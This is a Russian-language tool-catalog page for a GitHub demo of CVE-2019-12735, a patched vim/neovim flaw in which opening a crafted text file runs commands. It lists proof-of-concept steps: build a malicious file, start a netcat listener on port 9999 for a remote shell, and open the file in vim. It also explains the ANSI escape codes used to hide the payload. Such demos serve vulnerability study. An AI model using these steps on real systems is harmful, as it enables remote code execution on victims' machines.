Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2019-12735 — Демо для cve-2019-12735 | Kitploit
Инструменты/GitHubGitHub/st9007a/cve-2019-12735
Анализ уязвимостейЭксплуатацияШелл-кодОбучение и ОбразованиеРазработка Полезной НагрузкиЭксплуатация Бинарных ФайловArchived
GitHubst9007a/cve-2019-12735

CVE-2019-12735

Демо для cve-2019-12735

Репозиторий
4 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2019-12735

Эта CVE была исправлена после neovim 0.3.6 и vim 8.1.1365

POC

root@kitploit:~
vim demo1.txt

Удалённая оболочка

  1. Создайте вредоносный текстовый файл:
root@kitploit:~
gcc make_demo3.c -o make_demo3
./make_demo3
  1. Запустите клиент в другом сеансе:
root@kitploit:~
nc -vlp 9999
  1. Откройте вредоносный файл:
root@kitploit:~
vim demo3.txt

После этого вы можете выполнять любые команды Linux в этом сеансе.

Ссылки

  • Демо POC на GitHub
  • Exploit DB
  • netcat

ANSI

  • \x1b[?7l : не переходить на новую строку при достижении конца строки, постоянно перезаписывая последний символ
  • \x1bS: STS, установка состояния передачи
  • \x1b[1G: переместиться в колонку 1
  • \x1b[K: удалить все символы от текущей позиции курсора до конца строки
Скачать инструмент